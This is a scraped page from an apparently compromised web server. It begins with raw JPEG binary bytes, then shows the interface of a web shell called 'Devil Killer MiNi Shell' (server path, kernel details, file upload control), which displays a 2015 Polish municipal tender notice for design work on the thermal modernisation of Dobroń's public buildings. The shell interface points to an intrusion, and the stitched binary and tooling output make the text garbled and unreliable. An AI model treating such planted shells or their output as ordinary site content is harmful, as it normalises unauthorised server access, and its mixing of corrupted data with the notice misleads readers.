JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150806/201066-N-2015.html

<p class="kh_header"><b>Dobroń: Kompleksowa termomodernizacja budynków użyteczności publicznej na terenie  Gminy Dobroń.</b><br>
<b>Numer ogłoszenia: 201066 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobroń , ul. 11 Listopada 9, 95-082 Dobroń, woj. łódzkie, tel. 043 6772683, 6772130, faks 043 6772679.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobron.ug.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.dobron.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa termomodernizacja budynków użyteczności publicznej na terenie  Gminy Dobroń..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi polegającej na opracowaniu dokumentacji projektowej głębokiej modernizacji energetycznej 13 obiektów budowlanych, zadanie pod nazwą: Kompleksowa termomodernizacja budynków użyteczności publicznej na terenie  Gminy Dobroń. Projekt współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020.
Przewidywany zakres dokumentacji projektowej dla poszczególnych budynków obejmie: 
Budynek Urzędu Gminy, Dobroń ul. 11 Listopada 9
Projekt budowlany wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę 5 egz. obejmujący:
docieplenie przegród zewnętrznych, ściany, fundamenty, stropy, stolarka okienna i drzwiowa, 
wymianę konstrukcji dachowej wraz z pokryciem i dociepleniem uwzględniający   połączenie obu skrzydeł w jednolitą architektonicznie bryłę budynkową,
przebudowę wejść do potrzeb osób niepełnosprawnych, 
wymianę źródła ciepła w technologii gazowych absorpcyjnych pomp ciepła (grunt, powietrze-woda) wraz z wymianą instalacji grzewczej (ogrzewanie podłogowe i grzejniki z zastosowaniem termostatów i zaworów podpionowych) i instalacją c.w.u.,
osuszenie wraz z odbudową izolacji poziomej i pionowej ścian fundamentowych 
budowę systemu wentylacji mechanicznej z odzyskiem ciepła,
wewnętrzną i zewnętrzną instalację gazu ziemnego,
instalację oświetleniową (energooszczędną, opcja LED), instalację elektro-energetyczną i odgromową,
prace geologicznych (jeżeli będą konieczne),
Projekt wykonawczy wszystkich w/w/ branż 3 egz.
Projekt koncepcyjny (dach, elewacje wraz z  wizualizacją)  1 egz.
Wytyczne do planu  BIOZ 							             
Specyfikacje techniczne wykonania i odbioru robót budowlanych,		     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz. 		
Szkoła Podstawowa ul. Sienkiewicza 39 Dobroń,
Projekt budowlany wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę 5 egz. obejmujący:
docieplenie przegród zewnętrznych, ściany, fundamenty, stropy, stolarka okienna i drzwiowa (stolarka okienna również na sali gimnastycznej), 
wymianę źródła ciepła w technologii gazowych absorpcyjnych pomp ciepła (grunt, powietrze-woda) wraz z wymianą instalacji grzewczej (ogrzewanie podłogowe i grzejniki z zastosowaniem termostatów i zaworów podpionowych), obejmujący zasilanie w ciepła budynek Sienkiewicza 37, Witosa 1, i instalacją c.w.u.
osuszenie wraz z odbudową izolacji poziomej i pionowej ścian fundamentowych, 
wewnętrzną i zewnętrzną instalację gazu ziemnego,
instalację oświetleniową (energooszczędną, opcja LED), instalację elektro-energetyczną i odgromową,
prace geologicznych (jeżeli będą konieczne),
Projekt wykonawczy wszystkich w/w/ branż 3 egz.
Projekt koncepcyjny elewacje (docieplenia ściany północnej, płaskorzeźba) wraz z  wizualizacją  1 egz.,
Wytyczne do planu  BIOZ, 							             
Specyfikacje techniczne wykonania i odbioru robót budowlanych,		     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz.,
Zespół Szkół ul. Witosa 1 wraz z GOK, 
Projekt budowlany wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę 5 egz. obejmujący:
docieplenie przegród zewnętrznych, ściany, fundamenty, stropy, stolarka okienna i drzwiowa (stolarka okienna również na sali gimnastycznej), 
wymianą instalacji grzewczej (ogrzewanie podłogowe i grzejniki z zastosowaniem termostatów i zaworów podpionowych), zasilanej  w ciepło z budynku szkoły ul. Sienkiewicza 39 wraz z instalacją c.w.u. 
nadmuchowe ogrzewanie sala gimnastyczna z własnej kotłowni absorpcyjna pompa ciepła opcja kondensacyjny kocioł gazowy,
osuszenie wraz z odbudową izolacji pionowej ścian fundamentowych, 
wewnętrzną i zewnętrzną instalację gazu ziemnego,
budowę systemu wentylacji mechanicznej z odzyskiem ciepła,
instalację oświetleniową (energooszczędna, opcja LED), instalację elektro-energetyczną i odgromową,
Projekt wykonawczy wszystkich w/w/ branż 3 egz.
Projekt koncepcyjny elewacje (docieplenia ściany północnej, ) wraz z  wizualizacją  1 egz.,
Wytyczne do planu  BIOZ, 							             
Specyfikacje techniczne wykonania i odbioru robót budowlanych,		     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz.,
Szkoła Podstawowa w Mogilnie Dużym,
Projekt budowlany wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę 5 egz. obejmujący:
docieplenie przegród zewnętrznych, ściany, fundamenty, stropy, dach, stolarka okienna i drzwiowa, 
wymianę źródła ciepła w technologii sprężarkowych pomp ciepła (grunt, powietrze-woda) wraz z wymianą instalacji grzewczej (ogrzewanie podłogowe i grzejniki z zastosowaniem termostatów i zaworów podpionowych) i instalacją c.w.u.,
osuszenie wraz z odbudową izolacji poziomej i pionowej ścian fundamentowych, 
budowę systemu wentylacji mechanicznej z odzyskiem ciepła,
zasilanie w energię elektryczną,
instalację oświetleniową (energooszczędną, opcja LED), instalację elektro-energetyczną i odgromową,
prace geologicznych (jeżeli będą konieczne),
Projekt wykonawczy wszystkich w/w/ branż 3 egz.
Projekt koncepcyjny (dach, elewacje wraz z  wizualizacją)  1 egz.
Wytyczne do planu  BIOZ 							             
Specyfikacje techniczne wykonania i odbioru robót budowlanych,		     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz. Projekt budowlany docieplenia przegród zewnętrznych, ściany, fundamenty, dach, stropodach, stolarka okienna i drzwiowa,  
Szkoła Podstawowa w Chechle, Chechło Drugie ul. Lipowa 1
Projekt budowlany wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę 5 egz. obejmujący:
docieplenie przegród zewnętrznych, ściany, fundamenty, stropy, stolarka okienna i drzwiowa, 
wymiany więźby dachowe, pokrycia dachowego i docieplenia dachu,
wymianę źródła ciepła w technologii gazowych absorpcyjnych pomp ciepła (grunt, powietrze-woda) wraz z wymianą instalacji grzewczej (ogrzewanie podłogowe i grzejniki z zastosowaniem termostatów i zaworów podpionowych), i instalacją c.w.u.
osuszenie wraz z odbudową izolacji poziomej i pionowej ścian fundamentowych, 
wewnętrzną i zewnętrzną instalację gazu ziemnego (jeżeli zajdzie konieczność),
instalację oświetleniową (energooszczędną, opcja LED), instalację elektro-energetyczną i odgromową,
prace geologicznych (jeżeli będą konieczne),
Projekt wykonawczy wszystkich w/w/ branż 3 egz.
Projekt koncepcyjny elewacje (docieplenia ścian) wraz z  wizualizacją  1 egz.,
Wytyczne do planu  BIOZ, 							             
Specyfikacje techniczne wykonania i odbioru robót budowlanych,		     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz.,
Budynek Przedszkola, Ośrodek Zdrowia, ul. Sienkiewicza 60, Dobroń,
Projekt budowlany wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę 5 egz. obejmujący:
docieplenie przegród zewnętrznych, ściany, fundamenty, stropy, stolarka okienna i drzwiowa, 
wymianę źródła ciepła w technologii gazowych absorpcyjnych pomp ciepła (grunt, powietrze-woda) wraz z wymianą instalacji grzewczej (armatura grzejniki z zastosowaniem termostatów i zaworów podpionowych), i instalacją c.w.u.
osuszenie wraz z odbudową izolacji poziomej i pionowej ścian fundamentowych, drenaż odwadniający,
wewnętrzną i zewnętrzną instalację gazu ziemnego,
instalację oświetleniową (energooszczędną, opcja LED), instalację elektro-energetyczną i odgromową,
prace geologicznych (jeżeli będą konieczne),
Projekt wykonawczy wszystkich w/w/ branż 3 egz.
Projekt koncepcyjny elewacje (docieplenia ściany) wraz z  wizualizacją  1 egz.,
Wytyczne do planu  BIOZ, 							             
Specyfikacje techniczne wykonania i odbioru robót budowlanych,		     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz.,
Budynek mieszkalny, ul. 11-go Listopada 11, Dobroń
Projekt budowlany wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę 5 egz. obejmujący:
docieplenie przegród zewnętrznych, ściany, fundamenty, stropy, stolarka okienna i drzwiowa, 
wymianę źródła ciepła w technologii gazowych absorpcyjnych pomp ciepła (grunt, powietrze-woda opcja gazowy kocioł kondensacyjny) wraz z wymianą instalacji grzewczej z zastosowaniem termostatów i zaworów podpionowych,
osuszenie wraz z odbudową izolacji poziomej i pionowej ścian fundamentowych 
prace geologicznych (jeżeli będą konieczne),
wymianę instalacji elektro-energetycznej , 
modernizację instalacji wentylacyjnej (grawitacyjnej).
Projekt wykonawczy wszystkich w/w/ branż 3 egz.
Projekt koncepcyjny (elewacje wraz z  wizualizacją)  1 egz.
Wytyczne do planu  BIOZ, 							             
Specyfikacje techniczne wykonania i odbioru robót budowlanych,		     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz. 		
Budynek mieszkalny, ul. Sienkiewicza 37,
Projekt budowlany wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę 5 egz. obejmujący:
docieplenie przegród zewnętrznych, ściany, fundamenty, stropy, stolarka okienna i drzwiowa, 
instalacji CO (zasilanie z budynku Szkoły ul. Sienkiewicza 39) armatura wewnętrzna grzejniki z zastosowaniem termostatów i zaworów podpionowych,
osuszenie wraz z odbudową izolacji  pionowej ścian fundamentowych,
modernizację wentylacji grawitacyjnej. 
wymianę instalacji elektro-energetycznej i odgromowej,
adaptację parteru budynku na działalność oświatową, 
modernizację instalacji wentylacyjnej (grawitacyjnej).
Projekt wykonawczy wszystkich w/w/ branż 3 egz.
Projekt koncepcyjny (elewacje wraz z  wizualizacją)  1 egz.
Wytyczne do planu  BIOZ, 							             
Specyfikacje techniczne wykonania i odbioru robót budowlanych,		     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz. 		
Budynek mieszkalny ul. Sportowa 18, Dobroń
Projekt budowlany docieplenia przegród zewnętrznych, ściany, fundamenty, stropodach wraz z wymianą stolarki okiennej i drzwiowej, remontem kominów, modernizację instalacji wentylacyjnej (grawitacyjnej) wymianę instalacji elektro-energetycznej wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę lub  stosownie od wymagań dokonanie skutecznego zgłoszenia robót nie wymagających pozwoleń na budowę, 5 egz.
Projekt wykonawczy wszystkich w/w/ branż 3 egz.,
Projekt koncepcyjny (elewacje wraz z  wizualizacją)  1 egz.,
Wytyczne do planu  BIOZ, 							             
Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych,	     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz.
Budynek mieszkalny,  Markówka 50,
Projekt budowlany docieplenia przegród zewnętrznych ściany, fundamenty, stropy, dach wraz z wymianą stolarki okiennej i drzwiowej, remontem kominów, modernizację instalacji wentylacyjnej (grawitacyjnej), wymianę instalacji elektro-energetycznej wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę lub stosownie od wymagań dokonanie skutecznego zgłoszenia robót nie wymagających pozwoleń na budowę 5 egz.,
Projekt wykonawczy wszystkich w/w/ branż 3 egz.,
Projekt koncepcyjny (elewacje wraz z  wizualizacją)  1 egz.,
Wytyczne do planu  BIOZ, 							             
Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych,	     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz.
Budynek mieszkalny, Markówka 52,
Projekt budowlany docieplenia przegród zewnętrznych ściany, fundamenty, stropy, dach wraz z wymianą stolarki okiennej i drzwiowej, remontem kominów, modernizację instalacji wentylacyjnej (grawitacyjnej), wymianę instalacji elektro-energetycznej wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę lub stosownie od wymagań dokonanie skutecznego zgłoszenia robót nie wymagających pozwoleń na budowę 5 egz.,
Projekt wykonawczy wszystkich w/w/ branż 3 egz.,
Projekt koncepcyjny (elewacje wraz z  wizualizacją)  1 egz.,
Wytyczne do planu  BIOZ, 							             
Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych,	     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz.
Budynek mieszkalny, Mogilno Duże 14,
Projekt budowlany docieplenia przegród zewnętrznych ściany, fundamenty, stropy ,dach wraz z wymianą stolarki okiennej i drzwiowej, remontem kominów, modernizację instalacji wentylacyjnej (grawitacyjnej) wymianę instalacji elektro-energetycznej wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę lub stosownie od wymagań dokonanie skutecznego zgłoszenia robót nie wymagających pozwoleń na budowę 5 egz.,
Projekt wykonawczy wszystkich w/w/ branż 3 egz.,
Projekt koncepcyjny (elewacje wraz z  wizualizacją)  1 egz.,
Wytyczne do planu  BIOZ, 							             
Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych,	     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz.
Budynek mieszkalny Talar 1,
Projekt budowlany docieplenia przegród zewnętrznych ściany, fundamenty, stropy ,dach wraz z wymianą stolarki okiennej i drzwiowej, remontem kominów, modernizację instalacji wentylacyjnej (grawitacyjnej) wymianę instalacji elektro-energetycznej wraz z uzyskaniem ostatecznej decyzji pozwolenia na budowę lub stosownie od wymagań dokonanie skutecznego zgłoszenia robót nie wymagających pozwoleń na budowę 5 egz.,
Projekt wykonawczy wszystkich w/w/ branż 3 egz.,
Projekt koncepcyjny (elewacje wraz z  wizualizacją)  1 egz.,
Wytyczne do planu  BIOZ, 							             
Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych,	     	 
Przedmiar robót dla poszczególnych branż,						 
Kosztorys inwestorski dla wszystkich projektów branżowych wraz ze zbiorczym zestawieniem kosztów 1 egz.
Dokumentacja ma być opracowana w formie papierowej i elektronicznej, w tym:
Projekty budowlane w pięciu egzemplarzach papierowych oraz na nośniku elektronicznym tj. płycie CD lub DVD - jpg-pdf.
3Projekty wykonawcze w trzech egzemplarzach papierowych oraz na nośniku elektronicznym tj. płycie CD lub DVD - jpg-pdf.
Projekt prac geologicznych w trzech egzemplarzach papierowych oraz na nośniku elektronicznym tj. płycie CD lub DVD - jpg-pdf.
Kosztorys inwestorski i przedmiar robót po jednym egzp. w wersji papierowej oraz na nośniku elektronicznym tj. płycie CD  lub DVD - jpg-pdf.
STWiOR, charakterystyka energetyczna budynku w trzech egzemplarzach papierowych oraz na nośniku elektronicznym tj. płycie CD  lub DVD - jpg-pdf.
Przedmiot zamówienia obejmuje również:
zlecenie uprawnionemu geodecie  wykonanie map do celów projektowych (stosownie od potrzeb),
uzyskanie wymaganych prawem wszelkich niezbędnych opinii, uzgodnień, zgód, decyzji, pozwoleń, pomiarów i innych dokumentów niezbędnych  do prawidłowego wykonania prac projektowych,
udzielanie wyjaśnień i odpowiedzi na ewentualne zapytania skierowane przez oferentów w prowadzonym postępowaniu przetargowym na wybór wykonawcy robót budowlanych.
Dane informacyjne:
Wszelka kolorystyka elewacji, stolarki okiennej i drzwiowej oraz rodzaj projektowanych materiałów musi być uzgodniony i zaakceptowany przez Zamawiającego.
Zastosowane rozwiązania projektowe winny uwzględniać obowiązujące przepisy ppoż. dotyczące obiektów użyteczności publicznej oraz powinny obejmować założenia audytów energetycznych stanowiących załączniki do siwz.
Wielkość i funkcja budynku jest określona w załączonych do SIWZ  inwentaryzacjach, które służą do zobrazowania budynku jednak przy projektowaniu instalacji wewnętrznych wykonawca winień dokonać porównania i nanieść zmiany obrazujące stan istniejący.
Wykonawca będzie sprawował nadzór autorski w ramach którego należy wykonać m.in. następujące czynności:
nadzór w toku realizacji robót budowlanych nad zgodnością rozwiązań technicznych, materiałowych i użytkowych zgodnie z dokumentacją projektową,
uzupełniania szczegółów dokumentacji projektowej oraz wyjaśnienia wątpliwości powstałych w toku realizacji robót,
ewentualny udziału w naradach technicznych, przyjmuje się, że liczba pobytów projektanta (projektantów) na budowie wynikać będzie z uzasadnionych potrzeb określonych każdorazowo przez Zamawiającego lub występującego w jego imieniu inspektora nadzoru, a w wyjątkowych sytuacjach kierownika budowy,
udziału w odbiorach częściowych (istotnych robót budowlanych) i końcowych  poszczególnych obiektów,
aktualizacja kosztorysów inwestorskich wykonywana na wniosek Zamawiającego w celu zgodnego z przepisami Prawa zamówień publicznych przeprowadzenia postępowania (jednokrotna w ciągu 3 lat), 
Wykonawca opracuje komplet dokumentacji z należytą starannością, zgodnie z obowiązującymi normami i zasadami wiedzy technicznej, w oparciu o założenia wstępne, niezbędne uzgodnienia, zezwolenia i warunki wydane przez stosowne instytucje,  wizję lokalną oraz bieżące konsultacje z Zamawiającym.
W przypadku powoływania się podczas opisywania przyjętych rozwiązań  projektowych na konkretne nazwy własne gotowych produktów i lub gotowe rozwiązania systemowe producentów, wykonawca ma obowiązek określić konkretne parametry techniczne i jakościowe danego rozwiązania projektowego oraz umieścić informację o możliwości zastosowania rozwiązania równoważnego pod warunkiem spełnienia wskazanych parametrów technicznych.
Wykonawca przeniesie na rzecz Zamawiającego autorskie prawa majątkowe do opracowanej przez siebie dokumentacji projektowej.
Koszty uzyskania ww opracowań dokumentów ponosi Wykonawca (należy wkalkulować w cenę wykonania przedmiotu zamówienia).
Wykonawca w imieniu Zamawiającego uzyska decyzje o pozwoleniu na budowę, w przypadkach gdy zakres będzie wymagał tych decyzji lub musi być przygotowana w sposób umożliwiający dokonanie i uzyskanie skutecznego zgłoszenia robót nie wymagających pozwoleń na budowę.
W projektach budynków ( Markówka 50, Mogilno Duże 14, Szkoła Podstawowa w Chechle), które są ujęte w gminnym lub wojewódzkim rejestrze zabytków opracowania projektowe uwzględnią wytyczne wydane przez konserwatora zabytków. 
Projekty muszą uwzględniać Szczegółowy Opisu Osi Priorytetowych Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020 dla Osi Priorytetowej IV - Gospodarka niskoemisyjna Osi Priorytetowej VII - Infrastruktura dla usług społecznych. W zakresie indywidualnych źródeł ciepła instalacje o jak najmniejszej emisji CO2, PM 10 oraz innych zanieczyszczeń powietrza, muszą skutkować znaczną redukcją CO2 w odniesieniu do istniejących instalacji (o co najmniej 30 procent w przypadku zamiany spalanego paliwa). Urządzenia do ogrzewania powinny  charakteryzować się obowiązującym od końca 2020 r. minimalnym poziomem efektywności energetycznej i normami emisji zanieczyszczeń, które zostały określone w środkach wykonawczych do dyrektywy 2009-125-WE z dnia 21 października 2009 r. ustanawiającej ogólne zasady ustalania wymogów dotyczących ekoprojektu dla produktów związanych z energią. Projekty powinny być uzasadnione ekonomicznie i społecznie oraz, w stosownych przypadkach, przeciwdziałać ubóstwu energetycznemu. Projekty winny  zwiększać efektywność energetyczną i ograniczają zapotrzebowanie na energię w budynkach, w których wykorzystywana jest energia ze wspieranych urządzeń. Projekty powinny być zgodne z unijnymi standardami i przepisami w zakresie ochrony środowiska..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na prace projektowe. Wartość zamówień uzupełniających nie przekroczy 20 % wartości zamówienia podstawowego i będzie polegać na powtórzeniu tego samego rodzaju zamówienia zgodnego z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.32.00.00-7, 71.24.00.00-2, 71.25.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia art. 22 ust.1 ustawy Pzp;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
